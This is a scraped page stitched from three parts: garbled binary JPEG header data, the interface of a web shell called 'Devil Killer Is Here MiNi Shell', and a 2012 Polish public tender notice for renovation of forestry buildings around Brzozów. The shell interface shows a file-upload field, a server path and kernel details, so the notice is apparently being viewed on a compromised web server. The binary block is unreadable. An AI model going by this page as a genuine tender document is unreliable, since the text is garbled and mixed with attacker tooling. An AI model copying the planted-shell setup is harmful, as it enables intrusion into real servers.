JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120725/161851-N-2012.html

<p class="kh_header"><b>Brzozów: Roboty w zakresie remontów i modernizacji budynków na terenie Nadleśnictwa Brzozów w 2012</b><br>
<b>Numer ogłoszenia: 161851 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PGL LP Nadleśnictwo Brzozów , ul. Moniuszki 25, 36-200 Brzozów, woj. podkarpackie, tel. 12 4341524, faks 13 4341525.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty w zakresie remontów i modernizacji budynków na terenie Nadleśnictwa Brzozów w 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty obejmują dla  poszczególnych części  zamówienia : 

CZĘŚĆ  I
Przebudowa i remont budynku mieszkalnego l. Liszna nr  inw.165/31
Lokalizacja budynku: Sanok -Olchowce działka ewid. nr 839

1. W ramach robót modernizacyjnych wykonane  zostaną roboty:
- wymiana szalowania zewnętrznego z ociepleniem wełną mineralną 160m2
- wymiana stolarki okiennej 12 szt
- zadaszenie nad schodami wejściowymi  do mieszkania i kancelarii.
- Likwidacja drzwi garażowych,  zmniejszenie otworu, wstawienie drzwi wejściowych do kancelarii. 
- Ocieplenie podpiwniczenia płytami styropianowymi  88m2
- Wykonanie chodników z kostki brukowej  gr 6 cm - 82 m2
- Wykonanie nawierzchni z kostki brukowej gr. 8 cm - 46m2
- okładziny schodów zewnętrznych - 8,70m2
2. W ramach robót remontowych  wykonane zostaną roboty:
- demontaż boazerii drewnianej 44,2m2
- przestawienie ścianki wewnętrznej z płyty gipsowo - kartonowej 11,55m2
- rozebranie podłóg  drewnianych -27,81m2
- przetarcie tynków wewnętrznych
- posadzki z terakoty - 14,68m2
- podłoga panelowa - 13,12m2
- wymiana rurociągu c.o. 50mm - 5m
- malowane  tynków wewnętrznych - 91,43m2

CZĘŚĆ II
  Modernizacja kancelarii l-ctwa Sady 149/49
Lokalizacja : Rozpucie, Gmina Tyrawa Wołoska nr. dz. ewid. 1233

1. Wykonanie instalacji c.o. , montaż kotła gazowego, montaż grzejników  płytowych 4 szt, montaż przewodu odprowadzenia spalin 80/125 szt 1, rurociągi miedziane 49,2m.
2. Instalacja gazowa, rurociągi stalowe 6,5m, kurki gazowe 2szt,
3. Wymiana okien drewnianych 2 szt
4. Ocieplenie stropu wełna mineralna 10 cm 59,41m2
5. Ślepy pułap z desek gr 32mm - 59,41m2
6. Ocieplenie zewnętrzne ścian styropianem  gr 10 cm i wyprawa elewacyjna z tynków akrylowych 17,04m2.
7. Rozebranie   płytki odbojowej z betonu 26,m2
8. Podbudowa z kruszywa łamanego gr 23 cm - 36,48m2
8. Nawierzchnia z kostki brukowej gr.  6 cm na podsypce cem.- piaskowej.- 36,48m2.

  Remont budynku mieszkalnego Tyrawa W. 165/18
Lokalizacja: Tyrawa Wołoska nr dz. ewid. 479

1. Rozebranie podłóg drewnianych - 84,60m2
2. Rozebranie zasypki z materiałów sypkich 8,60m2
3. Podłoża pod posadzki, podkład betonowy 8,46m3
4. Izolacja z folii podposadzkowej ,izolacja cieplna styropian 5 cm, wylewka cementowa gr 5 cm zbrojona siatką stalową -84,60m2
5. Posadzka z paneli podłogowych - 75,45m5
6. Posadzka terakota 13,48m3
7. Rozebranie nawierzchni z płyt betonowych 18m2,
8. Wjazd z kostki brukowej gr.  8 cm z wykonaniem koryta, podbudowy z pospółki gr.    20 cm, warstwy z kruszywa łamanego 15 cm - 110,72m2
9. Nawierzchnia z mieszanej mineralno bitumicznych gr 7 cm - 100m2.

Budynek mieszk. Siemuszowa 165/16
Lokalizacja: Siemuszowa gmina Tyrawa Wołoska nr dz. ewid. 484/1

1. Izolacja cieplna stropu z płyt styropianowych gr 10 cm  70,96m2
2. Rozebranie polepy z materiałów sypkich m2 70,96
3. Warstwa wyrównawcza  z zaprawy cem gr 5 cm - 70,96m2
4. Izolacja wełna mineralna gr 10 cm - 43,16m2.
5. Ślepy pułap z desek 32 na izolacji z wełny - 43,16m2
6. Zadaszenie nad drzwiami wejściowymi 3,50m2
7. Wymiana rynien  śr 15 cm - 24,0m,
8. Wymiana okładzin schodów, skucie istniejących, okładzina z elementów kamiennych 3-5cm - 7,68m2.

Budynek mieszkalny Dobra 165/32 
Lokalizacja :Dobra gmina Sanok nr dz. ewid. 82/2

1. Rozebranie podłóg drewnianych -18m2
2. Rozebranie zasypki z materiałów sypkich m3 -  2,70
3. podkład z materiałów sypkich gr 10 cm - 1,80m3
4. Podkład betonowy gr 10 cm -1,80m3
5. Izolacja  przeciwwodne z folii - 18m2
6. Izolacja cieplna styropian 5 cm  - 18m2
7. Wylewka cementowa  gr. 5 cm - 18m2
8. Posadzka z paneli podłogowych 8,43m2
9. posadzka terakota -9,57m2.
10. Wymiana drzwi wewnet4rznych z ościeżnica - 1 szt
11. Chodnik z kostki brukowej gr 6 cm, z wykonaniem koryta, podbudowy z kruszywa łamanego 22cm - 17m2.

CZĘŚĆ III
Budynek biurowo- mieszkalny 165/1
Lokalizacja: Brzozów ul. Moniuszki 25 nr działki ewid. 1753/1, 1753/11

 1. Przebudowa  pomieszczeń wewnątrz budynku  :
-  ścianki działowe w pomieszczeniu sekretariatu z płyt gipsowo-kartonowych 21,44m2
- Remont instalacji wod -kan - wymiana pionu kanalizacji PCV 110 mm-  8,7m, podejść odpływowych PCV 50mm -3 szt, wymiana urządzeń sanitarnych - umywalka 3 szt, zlewozmywak 1 szt, 
- Remont  instalacji c.o. - wykonanie ogrzewania z podziałem na część mieszkalną i biurową, montaż kotłów gazowych dwufunkcyjnych szt 2, wymiana grzejników płytowych 6 szt, wymiana zaworów grzejnikowych 6 szt, wymiana rurociągów stalowych na miedziane -105m, 
- Wymiana rurociągu instalacji gazowej  20mm - 10,5m
- wymian skrzydeł drzwiowych - 3 szt
- licowanie ścian  płytkami glazurowanymi 40,33m2
- rozebranie podłóg drewnianych 16,32m2
- podłoże, izolacja przeciwwilgociowa,izolacja cieplna styropian 5 cm,, wylewka cementowa pod posadzkę gr. 5 cm, posadzka z drewna jesionowego -16,32m2
- demontaż boazerii - 28,3m2
- uzupełnienie tynku  szpachlowanych na ścianach -28,43m2
- wymiana posadzki z płyt kamiennych na marmurowe (holl) - 12,40m2

2. Roboty  zewnątrz budynku
- wymiana okładzin schodów zewnętrznych- 60,19 m2
- balustrada ze stali nierdzewnej - 6,2 m
- tynk cienkowarstwowy elewacji budynku typu Baranek -311,39m2
- rusztowanie zewnętrzne rurowe -320,0m2
3. Plac i parking
- demontaż  nawierzchni asfaltowej 275m2
-  wymiana obrzeży i krawężników - 49m2
- obramowanie rabatki kwiatowej z palisady prefabrykatów betonowych - 16,0 m
- kostka betonowa  gr 8 na podsypce piaskowo - cementowej gr 7 cm - 275m2
4. Mieszkanie - piętro
- wymiana  tablicy rozdzielczej instalacji elektrycznej, wyniesienie liczników pomiarowych na zewnątrz
- wymiana  przewodów instalacji elektrycznej
- demontaż boazerii
- przecierka tynków wewnętrznych po robotach demontażowych i instalacji elektrycznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy, polegających na powtórzeniu prac będących przedmiotem zamówienia lub jego części o wartości do 50% wartości zamówienia podstawowego (wartości umowy) w okresie 3 lat od udzielenia zamówienia podstawowego (od terminu podpisania umowy).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.33.00.00-9, 45.21.00.00-2, 45.34.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1.Oferta musi być zabezpieczona wadium o wartości: 2000,00 PLN dla każdej części zamówienia.
9.2.Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. tj. do dnia 09.08.2012, do godz. 1100. 
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym zamawiającego. 
9.3.Wadium może być wniesione w:
         a) pieniądzu - przelewem na konto zamawiającego w Bank BGŻ
 nr   51 2030 0045 1110 0000 0025 2260 z dopiskiem  
Roboty w zakresie remontów i modernizacji budynków  na terenie Nadleśnictwa Brzozów w 2012 r.
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym (oryginał);
c) gwarancjach bankowych (oryginał);
d) gwarancjach ubezpieczeniowych (oryginał);
e) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (oryginał).
9.4. Dokument w formie poręczenia powinien zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń. 
9.5 W tytule przelewu, dokonanego na wyżej podany rachunek bankowy Zamawiającego, należy podać znak sprawy niniejszego postępowania przetargowego (Z - 2710 - 6/12).
9.6 Wadium wnosi się przed upływem terminu składania ofert, przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego. Wadium wniesione w formie innej niż pieniądzu należy złożyć w formie oryginału w kasie Zamawiającego, a do oferty należy dołączyć potwierdzoną za zgodność z oryginałem kopię. 
9.7 Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium musi być podpisana przez upoważnionego przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 PZP.
9.8	 Wadium musi zabezpieczać cały okres związania ofertą.
9.9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem, że Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

9.10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
9.11. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
9.13. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 PZP, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykonania przedmiotu zamówienia nie jest wymagane posiadanie określonych uprawnień. Zamawiający uzna warunek za spełniony jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedłożą wykaz robót budowlanych tożsamych z przedmiotem zamówienia tj. związanych z remontem, modernizacją, przebudową lub budową budynków, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dokumentów np. protokołów odbioru robót, referencjami, listami polecającymi potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone o wartości minimum 100 tys. zł brutto (słownie sto tysięcy złotych) dla każdej części zamówienia.
Ocena w oparciu  Wykaz robót budowlanych tożsamych z przedmiotem zamówienia tj związanych z remontem, modernizacją, przebudowa lub budową budynków, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dokumentów protokołów odbioru robót, referencji, listów polecających potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone o wartości minimum 100 tys. zł brutto dla każdej z części według załącznika nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawca przedłoży oświadczenie o posiadaniu  odpowiedniego potencjału technicznego potrzebnego do realizacji danej części zamówienia.
Ocena w oparciu o Oświadczenie, że wykonawca dysponuje odpowiednim potencjałem technicznym potrzebnym do realizacji danej części zamówienia  według załącznika nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedłożą wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - co najmniej 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej.
Ocena w oparciu o Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - co najmniej 1 osoba dla każdej z części posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, według załącznika nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału finansowego.
Przedłożą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 100 tys. zł (słownie sto tysięcy złotych)
Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 100 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>17.2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w razie wystąpienia jednej lub kilku z poniższych okoliczności: 

a)	potrzeby wprowadzenia zmian w Specyfikacji technicznej wykonania 
i odbioru robót budowlanych, będących podstawą realizacji przedmiotu Umowy, wywołanej zmianami w przepisach prawa, normach i standardach, zmianami w wiedzy technicznej lub zmianą funkcji użytkowej, a także zmianami uwarunkowań środowiskowych, technicznych, technologicznych lub innymi okolicznościami;

b)	potrzeby wprowadzenia zmian w miejscu i sposobie wykonania robót budowlanych, wynikających ze zmian technologicznych, osobowych, w organizacji spełnienia świadczenia, spowodowanych zmianami w przepisach prawa, norm i standardów lub zmianami w wiedzy technicznej, zmianami uwarunkowań środowiskowych lub innymi okolicznościami;

c)	potrzeby zmiany terminu realizacji spowodowanej: 

1.	wystąpieniem warunków atmosferycznych mających wpływ na brak możliwości lub utrudnienie wykonywania umowy, np. długotrwałe intensywne opady, powódź powodująca konieczność przerwania robót na czas niezbędny na osuszenie zalanego terenu do momentu, w którym możliwa jest kontynuacja lub rozpoczęcie robót, itp.;
2.	zmianami wynikającymi ze zmian przepisów prawa, norm, standardów, wiedzy technicznej, warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi, ochrony środowiska, itp., 
3.	okolicznościami, których nie można było przewidzieć w chwili zawarcia Umowy;
4.	okolicznościami leżącymi po stronie Zamawiającego;
5.	okolicznościami będącymi następstwem działania organów administracji i innych podmiotów trzecich, a także działania siły wyższej

d)	potrzeby zmiany wynagrodzenia umownego pod warunkiem, że zmiana ta będzie spowodowana zmniejszeniem zakresu przedmiotu umowy; 

e)	przyczyn zewnętrznych niezależnych od Zamawiającego oraz wykonawcy skutkujących niemożliwością prowadzenia działań w celu wykonania umowy. 

